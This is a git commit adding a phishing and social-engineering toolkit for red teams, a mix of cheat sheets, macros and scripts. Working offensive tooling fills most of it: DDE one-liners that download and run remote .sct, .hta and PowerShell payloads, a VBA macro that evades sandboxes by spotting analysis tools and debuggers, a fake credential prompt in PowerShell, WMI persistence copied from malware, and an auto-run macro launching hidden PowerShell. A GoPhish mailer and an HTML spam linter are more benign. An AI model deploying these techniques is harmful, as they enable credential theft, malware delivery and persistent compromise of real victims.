Added phishing directory.

mgeeky
2021-10-17 15:22:05 +02:00
parent 522a826ecb
commit e104ba2539
21 changed files with 2749 additions and 45 deletions


@ -0,0 +1,28 @@
## Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
- Using `regsvr32` _*.sct_ files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
```
- Using `HTA` files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
```
- Method from Empire - unfortunately unable to hide 'powershell.exe -NoP -sta -NonI' sequence
```
DDEAUTO C:\\Microsoft\\Programs\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.56.101/default.ps1');powershell -noP -sta -w 1 -enc $e "
```
- CactusTorch DDE can also generate files in **JS** and **VBS** formats.
They will utilize `cscript` as a file interpreter.
- Another option is to use scripts by _Dominic Spinosa_ found [here](https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads)
- Another option is to stick with `Unicorn` by _Dave Kennedy_
## Sources
- https://medium.com/red-team/dde-payloads-16629f4a2fcd


@ -0,0 +1,139 @@
Private Declare PtrSafe Function isDbgPresent Lib "kernel32" Alias "IsDebuggerPresent" () As Boolean
Public Function IsFileNameNotAsHexes() As Boolean
Dim str As String
Dim hexes As Variant
Dim only_hexes As Boolean
only_hexes = True
hexes = Array("0", "1", "2", "3", "4", "5", "6", "7", _
"8", "9", "a", "b", "c", "d", "e", "f")
str = ActiveDocument.name
str = Mid(str, 1, InStrRev(str, ".") - 1)
For i = 1 To UBound(hexes, 1) - 1
Dim ch As String
ch = LCase(Mid(str, i, 1))
If Not (UBound(Filter(hexes, ch)) > -1) Then
' Character not in hexes array.
only_hexes = False
Exit For
End If
Next
only_hexes = (Not only_hexes)
IsFileNameNotAsHexes = only_hexes
End Function
Public Function IsProcessListReliable() As Boolean
Dim objWMIService, objProcess, colProcess
Dim strComputer, strList
Dim bannedProcesses As Variant
bannedProcesses = Array("fiddler", "vxstream", _
"tcpview", "vmware", "procexp", "vmtools", "autoit", _
"wireshark", "procmon", "idaq", "autoruns", "apatedns", _
"windbg")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process")
For Each objProcess In colProcess
For Each proc In bannedProcesses
If InStr(LCase(objProcess.name), LCase(proc)) <> 0 Then
' Found banned process.
IsProcessListReliable = False
Exit Function
End If
Next
Next
If isDbgPresent() Then
IsProcessListReliable = False
Exit Function
End If
IsProcessListReliable = (colProcess.Count() > 50)
End Function
Public Function IsHardwareReliable() As Boolean
Dim objWMIService, objItem, colItems, strComputer
Dim totalSize, totalMemory, cpusNum As Integer
totalSize = 0
totalMemory = 0
cpusNum = 0
Const wbemFlagReturnImmediately = &H10
Const wbemFlagForwardOnly = &H20
strComputer = "."
' Checking total HDD size
Set objWMIService = GetObject _
("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk")
For Each objItem In colItems
Dim num
num = Int(objItem.Size / 1073741824)
If num > 0 Then
totalSize = totalSize + num
End If
Next
If totalSize < 60 Then
' Total HDD size of the machine must be at least 60GB
IsHardwareReliable = False
Exit Function
End If
' Checking Memory
Set colComputer = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer In colComputer
totalMemory = totalMemory + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
Next
If totalMemory < 1024 Then
' Total Memory is less than 1GB
IsHardwareReliable = False
Exit Function
End If
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems2
cpusNum = cpusNum + objItem.NumberOfLogicalProcessors
Next
If cpusNum < 2 Then
' Nowadays everyone has at least 2 logical cores.
IsHardwareReliable = False
Exit Function
End If
IsHardwareReliable = True
End Function
Public Function IsRunningInSandbox() As Boolean
Dim test As Boolean
If IsFileNameNotAsHexes() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsProcessListReliable() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsHardwareReliable() <> True Then
IsRunningInSandbox = True
Exit Function
End If
IsRunningInSandbox = False
End Function
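Review bot: MacroDetectSandbox.vbs has no header comment, whereas WMIPersistence.vbs and vba-windows-persistence.vbs in this same commit open with a `SYNOPSIS` / `USAGE` / `AUTHOR` block; a matching header naming the entry point would keep the directory consistent, e.g. `' USAGE:` / `'   IsRunningInSandbox()` / `'   Returns True as soon as one of the three IsXxxReliable() checks returns False`. On the style side, `Dim totalSize, totalMemory, cpusNum As Integer` only types `cpusNum` — in VBA each name needs its own `As`, so `totalSize` and `totalMemory` are Variant — and the loop variables `i` and `proc` are never declared, which the module would reject under `Option Explicit`.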

phishing/Phish-Creds.ps1 Normal file

@ -0,0 +1,24 @@
<#
try {
(Get-Credential -Credential $null).GetNetworkCredential() |
Select-Object @{name="User"; expression = {
If ($_.Domain -ne [string]::Empty) {
"{0}\{1}" -f ($_.Domain), ($_.UserName)
} Else {
$_.UserName
}
}
}, Password | Format-List
} catch {
}
One can additionally add, right after Get-Credential following parameters that could improve
pretext's quality during social engineering attempt:
-Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog
-Message "Some luring sentence" - to include some luring message
#>
try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { }

phishing/PhishingPost Submodule

Submodule phishing/PhishingPost added at bbb1add733

phishing/README.md Normal file

@ -0,0 +1,297 @@
## Phishing and Social-Engineering related scripts, tools and CheatSheets
- **`decode-spam-headers.py`** - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and will attempt to parse them.
This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them.
Resulting output will contain useful information on why this e-mail might have been blocked.
Processed headers:
- `Authentication-Results`
- `From`
- `Received-SPF`
- `Received`
- `To`
- `X-Forefront-Antispam-Report`
- `X-Mailer`
- `X-Microsoft-Antispam-Mailbox-Delivery`
- `X-Microsoft-Antispam-Message-Info`
- `X-Microsoft-Antispam`
- `X-MS-Exchange-Transport-EndToEndLatency`
- `X-MS-Oob-TLC-OOBClassifiers`
- `X-MS-Exchange-AtpMessageProperties`
- `X-Exchange-Antispam-Report-CFA-Test`
- `X-Microsoft-Antispam-Report-CFA-Test`
- `X-MS-Exchange-AtpMessageProperties`
- `X-Spam-Status`
- `X-Spam-Level`
- `X-Spam-Flag`
- `X-Spam-Report`
- and more...
Most of these headers are not fully documented, therefore the script is unable to pinpoint all the details, but at least it collects all I could find on them.
Sample run:
```
PS> py decode-spam-headers.py headers.txt
------------------------------------------
(1) Test: Received - Mail Servers Flow
HEADER:
Received
VALUE:
...
ANALYSIS:
- List of server hops used to deliver message:
--> (1) "attacker" <attacker@attacker.com>
|_> (2) ec2-11-22-33-44.eu-west-3.compute.amazonaws.com. (11.22.33.44)
time: 01 Jan 2021 12:34:18
|_> (3) mail-wr1-f51.google.com (209.85.221.51)
time: 01 Jan 2021 12:34:20
version: fuzzy match: Exchange Server 2019 CU11; October 12, 2021; 15.2.986.9
|_> (4) SN1NAM02FT0061.eop-nam02.prod.protection.outlook.com (2603:10b6:806:131:cafe::e5)
time: 01 Jan 2021 12:34:20
version: fuzzy match: Exchange Server 2019 CU11; October 12, 2021; 15.2.986.9
|_> (5) SA0PR11CA0138.namprd11.prod.outlook.com (2603:10b6:806:131::23)
time: 01 Jan 2021 12:34:20
version: fuzzy match: Exchange Server 2019 CU11; October 12, 2021; 15.2.986.9
|_> (6) CP2PR80MB4114.lamprd80.prod.outlook.com (2603:10d6:102:3c::15)
time: 01 Jan 2021 12:34:23
|_> (7) "Victim Surname" <victim@contoso.com>
------------------------------------------
[...]
------------------------------------------
(4) Test: Mail Client Version
HEADER:
X-Mailer
VALUE:
OEM
ANALYSIS:
- X-Mailer header was present and contained value: "OEM".
------------------------------------------
(5) Test: X-Forefront-Antispam-Report
HEADER:
X-Forefront-Antispam-Report
VALUE:
CIP:209.85.221.51;CTRY:US;LANG:de;SCL:5;SRV:;IPV:NLI;SFV:SPM;H:mail-wr1-f51.google.com;PTR:mail-wr1
-f51.google.com;CAT:SPM;SFS:(4636009)(6916009)(1096003)(6666004)(4744005)(19625305002)(58800400
005)(166002)(336012)(356005)(55446002)(5660300002)(956004)(121216002)(7596003)(7636003)(9686003
)(86362001)(224303003)(26005)(35100500006)(43540500002);DIR:INB;
ANALYSIS:
- CIP: Connecting IP address: 209.85.221.51
- CTRY: The source country as determined by the connecting IP address
- US
- LANG: The language in which the message was written
- de
- IPV: Ingress Peer Verification status
- NLI: The IP address was not found on any IP reputation list.
- SFV: Message Filtering
- SPM: The message was marked as spam by spam filtering.
- H: The HELO or EHLO string of the connecting email server.
- mail-wr1-f51.google.com
- PTR: Reverse DNS of the Connecting IP peer's address
- mail-wr1-f51.google.com
- CAT: The category of protection policy
- SPM: Spam
- DIR: Direction of email verification
- INB: Inbound email verification
- Message matched 23 Anti-Spam rules:
- (1096003)
- (121216002)
- (166002)
- (19625305002)
- (224303003)
- (26005)
- (336012)
- (35100500006) - (SPAM) Message contained embedded image.
- (356005)
- (43540500002)
- (4636009)
- (4744005)
- (55446002)
- (5660300002)
- (58800400005)
- (6666004)
- (6916009)
- (7596003)
- (7636003)
- (86362001)
- (956004)
- (9686003)
- SCL: Spam Confidence Level: 5
- SPAM: Spam filtering marked the message as Spam
More information:
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spam-message-headers
- https://docs.microsoft.com/en-us/exchange/antispam-and-antimalware/antispam-protection/antispam-stamps
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/spam-confidence-levels
- https://docs.microsoft.com/en-us/exchange/monitoring/trace-an-email-message/run-a-message-trace-and-view-results
------------------------------------------
(6) Test: X-Microsoft-Antispam-Mailbox-Delivery
HEADER:
X-Microsoft-Antispam-Mailbox-Delivery
VALUE:
ucf:0;jmr:1;auth:0;dest:J;ENG:(910001)(944506458)(944626604)(750132)(520011016);
ANALYSIS:
- This header denotes what to do with received message, where to put it.
- auth: Message originating from Authenticated sender
- 0: Not Authenticated
- dest: Destination where message should be placed
- J: JUNK directory
- Message matched 6 Anti-Spam Delivery rules:
- (520011016)
- (750132)
- (910001)
- (944506458)
- (944626604)
------------------------------------------
(7) Test: X-Microsoft-Antispam Bulk Mail
HEADER:
X-Microsoft-Antispam
VALUE:
BCL:0;
ANALYSIS:
- BCL: BULK Confidence Level: 0
The message isn't from a bulk sender.
More information:
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/bulk-complaint-level-values
------------------------------------------
[...]
------------------------------------------
(10) Test: MS Defender ATP Message Properties
HEADER:
X-MS-Exchange-AtpMessageProperties
VALUE:
SA|SL
ANALYSIS:
- MS Defender Advanced Threat Protection enabled following protections on this message:
- Safe Attachments Protection
- Safe Links Protection
------------------------------------------
(11) Test: Domain Impersonation
HEADER:
From
VALUE:
"attacker" <attacker@attacker.com>
ANALYSIS:
- Mail From: <attacker@attacker.com>
- Mail Domain: attacker.com
--> resolves to: 11.22.33.44
--> reverse-DNS resolves to: ec2-11-22-33-44.eu-west-3.compute.amazonaws.com
(sender's domain: amazonaws.com)
- First Hop: SMTP-SERVICE (44.55.66.77)
--> resolves to:
--> reverse-DNS resolves to: host44-55-66-77.static.arubacloud.pl
(first hop's domain: arubacloud.pl)
- Domain SPF: "v=spf1 include:_spf.google.com ~all"
- WARNING! Potential Domain Impersonation!
- Mail's domain should resolve to: amazonaws.com
- But instead first hop resolved to: arubacloud.pl
```
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
- **`gophish-send-mail`** - This script will connect to your GoPhish instance, adjust HTML template and will send a quick test e-mail wherever you told it to, in attempt to let you quickly test out your HTML code.
- **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`Macro-Less-Cheatsheet.md`** - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet ([gist](https://gist.github.com/mgeeky/981213b4c73093706fc2446deaa5f0c5))
- **`macro-psh-stdin-author.vbs`** - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. ([gist](https://gist.github.com/mgeeky/50c4b7fa22d930a80247fea62755fbd3))
- **`Phish-Creds.ps1`** - Powershell oneline Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on seized machine. ([gist](https://gist.github.com/mgeeky/a404d7f23c85954650d686bb3f02abaf))
One can additionally add, right after `Get-Credential` following parameters that could improve pretext's quality during social engineering attempt:
- `-Credential domain\username` - when we know our victim's domain and/or username - we can supply this info to the dialog
- `-Message "Some luring sentence"` - to include some luring message
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
- **`phishing-HTML-linter.py`** - This script will help you identify issues with your HTML code that you wish to use as your Phishing template.
It looks for things such as:
- Embedded images
- Images with lacking `ALT=""` attribute
- Anchors trying to masquerade links
Such characteristics are known bad smells that will let your e-mail blocked.
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
- **`warnings\EN-Word.docx`** and **`warnings\EN-Excel.docx`** - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.
- **`WMIPersistence.vbs`** - Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up. ([gist](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a))
- **`Various-Macro-Based-RCEs.md`** - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`vba-macro-mac-persistence.vbs`** - (WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros. ([gist](https://gist.github.com/mgeeky/dd184e7f50dfab5ac97b4855f23952bc))
- **`vba-windows-persistence.vbs`** - VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run. ([gist](https://gist.github.com/mgeeky/07ffbd9dbb64c80afe05fb45a0f66f81))
- [**`VisualBasicObfuscator`**](https://github.com/mgeeky/VisualBasicObfuscator) - Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.



@ -0,0 +1,77 @@
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WMIPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.query = query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function
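Review bot: The entire `WMIPersistence` function in this file is duplicated in vba-windows-persistence.vbs further down in the same commit (its lines 969–1016), differing only in the casing of `query`/`Query` and `name`/`Name`, so every future correction has to be made twice and the two copies have already started to drift. Either keep a single copy and have the other file's SYNOPSIS point at it, or state here which file is the canonical one, e.g. `' NOTE: a copy of this function lives in vba-windows-persistence.vbs; keep both in sync.` Also, `Dim filterName, consumerName As String` types only `consumerName` — `filterName` is a Variant — and `query` is never declared at all; `Dim filterName As String, consumerName As String, query As String` would make the module survive `Option Explicit`.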



@ -0,0 +1,56 @@
## `gophish-send-mail.py`
This script will connect to your GoPhish instance, adjust HTML template and will send a quick test e-mail wherever you told it to, in attempt to let you quickly test out your HTML code.
1. Firstly you need to come up with YAML configuration file:
These are required parameters:
```
gophish_addr: https://127.0.0.1:3100
token: 1b07b71b0ba50...API_KEY...efe720a1ab79
file: test.html
template_name: existing-template-name
sender: sender@attacker.com
recipient: recipient@contoso.com
```
These are optional parameters:
- `subject`
- `first_name`
- `last_name`
- `position`
- `url`
- `dont_restore`
2. Then prepare your HTML file with message you want to send.
3. And run it.
Sample run:
```
PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
[+] Template to use:
ID: 22
Name: test-template-1
Subject: Click Here To Win
[.] Updating it...
[+] Template updated.
[.] Sending e-mail via Campaign -> Send Test Email...
From: sender@attacker.com
To: recipient@contoso.com
[+] Email Sent
[.] Restoring template...
[+] Finished.
```


@ -0,0 +1,8 @@
gophish_addr: https://127.0.0.1:3100
token: 1b07b71b0ba50...API_KEY...efe720a1ab79
file: test.html
template_name: existing-template-name
sender: sender@attacker.com
recipient: recipient@contoso.com


@ -0,0 +1,202 @@
#!/usr/bin/python3
import os, sys, re
import string
import argparse
import yaml
import json
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
options = {
'gophish_addr': '',
'token' : '',
'file' : '',
'template_name' : '',
'subject': '',
'first_name': '',
'last_name': '',
'position': '',
'sender': '',
'recipient': '',
'url' : '',
'dont_restore' : False
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',
'Authorization': '',
}
def get(url):
r = requests.get(
f"{options['gophish_addr']}" + url,
headers = headers,
verify = False
)
if r.status_code != 200:
print(f'[!] URL: {url} returned status code: {r.status_code}!')
print(r.json())
sys.exit(1)
return r.json()
def put(url, data):
r = requests.put(
f"{options['gophish_addr']}" + url,
headers = headers,
json = data,
verify = False
)
if r.status_code != 200:
print(f'[!] URL: {url} returned status code: {r.status_code}!')
print(r.json())
sys.exit(1)
return r.json()
def post(url, data):
r = requests.post(
f"{options['gophish_addr']}" + url,
headers = headers,
json = data,
verify = False
)
if r.status_code != 200:
print(f'[!] URL: {url} returned status code: {r.status_code}!')
print(r.json())
sys.exit(1)
return r.json()
def getTemplate():
out = get("/api/templates/?{}")
for obj in out:
if obj['name'] == options['template_name']:
return obj
print(f'[!] Could not find template named: "{options["template_name"]}"!')
sys.exit(1)
def updateTemplate(template, html):
obj = {}
obj.update(template)
obj['html'] = html
if len(options['subject']) > 0:
obj['subject'] = options['subject']
out = put(f'/api/templates/{template["id"]}', obj)
def sendEmail():
obj = {
"template":{
"name": options['template_name']
},
"first_name": options['first_name'],
"last_name": options['last_name'],
"email": options['recipient'],
"position": options['position'],
"url":options['url'],
"page": {
"name": ""
},
"smtp": {
"name": options['sender']
}
}
out = post('/api/util/send_test_email', obj)
if out['success']:
print('[+] ' + out['message'])
else:
print('[!] ' + out['message'])
def opts(argv):
global options
global headers
o = argparse.ArgumentParser(
usage = 'gophish-send-mail.py [options] <config.yaml>'
)
req = o.add_argument_group('Required arguments')
req.add_argument('config', help = 'YAML config file')
args = o.parse_args()
op = None
with open(args.config, encoding='utf-8') as f:
op = yaml.safe_load(f)
for k in (
'gophish_addr',
'token',
'file',
'template_name',
'recipient',
'sender'
):
if k not in op.keys():
print(f'[!] {k} not specified!')
sys.exit(1)
if op['gophish_addr'][-1] == '/':
op['gophish_addr'] = op['gophish_addr'][:-1]
headers['Authorization'] = f'Bearer {op["token"]}'
options.update(op)
return op
def main(argv):
args = opts(argv)
if not args:
return False
print('''
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
''')
template = getTemplate()
print(f'''[+] Template to use:
ID: {template["id"]}
Name: {template["name"]}
Subject: {template["subject"]}
''')
print(f'[.] Updating it with file "{options["file"]}"...')
html = ''
with open(options['file'], 'rb') as f:
html = f.read()
updateTemplate(template, html.decode())
print('[+] Template updated.')
print(f'''[.] Sending e-mail via Campaign -> Send Test Email...
From: {options['sender']}
Recipient: {options['recipient']}
''')
sendEmail()
if not options['dont_restore']:
print('[.] Restoring template...')
updateTemplate(template, template['html'])
print('[+] Finished.')
if __name__ == '__main__':
main(sys.argv)
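Review bot: All three request helpers (`get`, `put`, `post`) hard-code `verify = False` and the module silences the resulting warning globally at import time, so the GoPhish API token carried in the `Authorization: Bearer` header is never protected by certificate validation, even when `gophish_addr` points at a remote instance rather than the `127.0.0.1` of the sample config. Make this a configuration choice instead of a constant: add `'verify': True` to the `options` defaults, pass `verify = options['verify']` in the three calls (requests also accepts a CA-bundle path there), and only call `disable_warnings` when the config explicitly opts out. Separately, `opts` assumes `yaml.safe_load` returned a mapping — an empty config file yields `None`, so `op.keys()` raises `AttributeError` before the friendlier `[!] ... not specified!` message can be shown; a guard such as `if not isinstance(op, dict): sys.exit('[!] config file is empty or not a mapping')` would cover it, and `op['gophish_addr'][-1]` likewise fails on an empty string. Minor: `updateTemplate` assigns the `put` result to `out` and never reads it, and the error path in the helpers calls `r.json()` on a failed response, which raises its own exception if the body is not JSON.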


@ -0,0 +1,12 @@
Private Sub Workbook_Open()
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub


@ -0,0 +1,222 @@
#!/usr/bin/python3
import os, sys, re
import string
import argparse
import yaml
import json
from bs4 import BeautifulSoup
options = {
'format' : 'text',
}
class PhishingMailParser:
def __init__(self, options):
self.options = options
self.results = {}
def parse(self, html):
self.html = html
self.soup = BeautifulSoup(html, features="lxml")
self.results['Embedded Images'] = self.testEmbeddedImages()
self.results['Images without ALT'] = self.testImagesNoAlt()
self.results['Masqueraded Links'] = self.testMaskedLinks()
return {k: v for k, v in self.results.items() if v}
@staticmethod
def context(tag):
s = str(tag)
if len(s) < 100:
return s
beg = s[:50]
end = s[-50:]
return f'{beg}...{end}'
def testMaskedLinks(self):
links = self.soup('a')
desc = 'Links that masquerade their href= attribute by displaying different link are considered harmful and will increase Spam score.'
context = ''
result = ''
num = 0
embed = ''
for link in links:
try:
href = link['href']
except:
continue
text = link.getText()
url = re.compile(r'((http|https)\:\/\/)?[a-zA-Z0-9\.\/\?\:@\-_=#]+\.([a-zA-Z]){2,6}([a-zA-Z0-9\.\&\/\?\:@\-_=#])*')
m1 = url.match(href)
m2 = url.match(text)
if m1 and m2:
num += 1
context += '- ' + PhishingMailParser.context(link) + '\n'
context += f'\thref = "{href[:64]}"\n'
context += f'\ttext = "{text[:64]}"\n\n'
if num > 0:
result += f'- Found {num} <a> tags that masquerade their href="" links with text!\n'
result += '\t Links that try to hide underyling URL are harmful and will be considered as Spam!\n'
if len(result) == 0:
return []
return {
'description' : desc,
'context' : context,
'analysis' : result
}
def testImagesNoAlt(self):
images = self.soup('img')
desc = 'Images without ALT="value" attribute may increase Spam scorage.'
context = ''
result = ''
num = 0
embed = ''
for img in images:
src = img['src']
alt = ''
try:
alt = img['alt']
except:
pass
if alt == '':
num += 1
context += '- ' + PhishingMailParser.context(img) + '\n'
if num > 0:
result += f'- Found {num} <img> tags without ALT="value" attribute.\n'
result += '\t Images without alternate text set in their attribute may increase Spam score\n'
if len(result) == 0:
return []
return {
'description' : desc,
'context' : context,
'analysis' : result
}
def testEmbeddedImages(self):
images = self.soup('img')
desc = 'Embedded images can increase Spam Confidence Level (SCL) in Office365 by 4 points. Embedded images are those with <img src="data:image/png;base64,<BLOB>"/> . They should be avoided.'
context = ''
result = ''
num = 0
embed = ''
for img in images:
src = img['src']
alt = ''
try:
alt = img['alt']
except:
pass
if src.lower().startswith('data:image/'):
if len(embed) == 0:
embed = src[:30]
num += 1
if len(alt) > 0:
context += f'- ALT="{alt}": ' + PhishingMailParser.context(img) + '\n'
else:
context += '- ' + PhishingMailParser.context(img) + '\n'
if num > 0:
result += f'- Found {num} <img> tags with embedded image ({embed}).\n'
result += '\t Embedded images increase Office365 SCL (Spam) level by 4 points!\n'
if len(result) == 0:
return []
return {
'description' : desc,
'context' : context,
'analysis' : result
}
def printOutput(out):
if options['format'] == 'text':
width = 100
num = 0
for k, v in out.items():
num += 1
analysis = v['analysis']
context = v['context']
analysis = analysis.replace('- ', '\t- ')
print(f'''
------------------------------------------
({num}) Test: {k}
CONTEXT:
{context}
ANALYSIS:
{analysis}
''')
elif options['format'] == 'json':
print(json.dumps(out))
def opts(argv):
global options
global headers
o = argparse.ArgumentParser(
usage = 'phishing-HTML-linter.py [options] <file.html>'
)
req = o.add_argument_group('Required arguments')
req.add_argument('file', help = 'Input HTML file')
args = o.parse_args()
return args
def main(argv):
args = opts(argv)
if not args:
return False
print('''
:: Phishing HTML Linter
Shows you bad smells in your HTML code that will get your mails busted!
Mariusz B. / mgeeky
''')
html = ''
with open(args.file, 'rb') as f:
html = f.read()
p = PhishingMailParser({})
ret = p.parse(html.decode())
printOutput(ret)
if __name__ == '__main__':
main(sys.argv)
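Review bot: `src = img['src']` in `testImagesNoAlt` and again in `testEmbeddedImages` raises `KeyError` for any `<img>` tag that has no `src` attribute, aborting the whole lint run on otherwise valid HTML, while `alt` two lines below is read defensively; use `src = img.get('src', '')` and `alt = img.get('alt', '')` in both methods (and `href = link.get('href')` with a `None` check in `testMaskedLinks`) in place of the bare `except:` blocks, which also swallow unrelated errors. `opts` declares `global headers`, a name this file never defines (a leftover from gophish-send-mail.py), and `options['format']` is never exposed through argparse, so the `json` branch of `printOutput` cannot be reached from the command line; either add a `--format` argument or document that it is only set programmatically. `parse` also stores `self.html` and `self.soup` as attributes that `__init__` does not initialise, which is worth a one-line class docstring noting that `parse` must be called before any `test*` method.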


@ -0,0 +1,81 @@
#If VBA7 Then
' 64-bit Mac (2016)
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare PtrSafe Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As LongPtr) As Long
Private Declare PtrSafe Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As LongPtr) As Long
#Else
' 32-bit Mac
Private Declare Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As Long
Private Declare Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As Long) As Long
Private Declare Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As Long) As Long
#End If
Sub writeToFile(ByVal file As String, ByVal txt As String)
#If Mac Then
#If VBA7 Then
Dim fp As LongPtr
#Else
Dim fp As Long
#End If
Dim grants
grants = Array(file)
GrantAccessToMultipleFiles(grants)
' BUG: fopen will return 0 here.
fp = fopen(file, "w")
If fp = 0 Then: Exit Sub
fputs txt, fp
fclose(fp)
#End If
End Sub
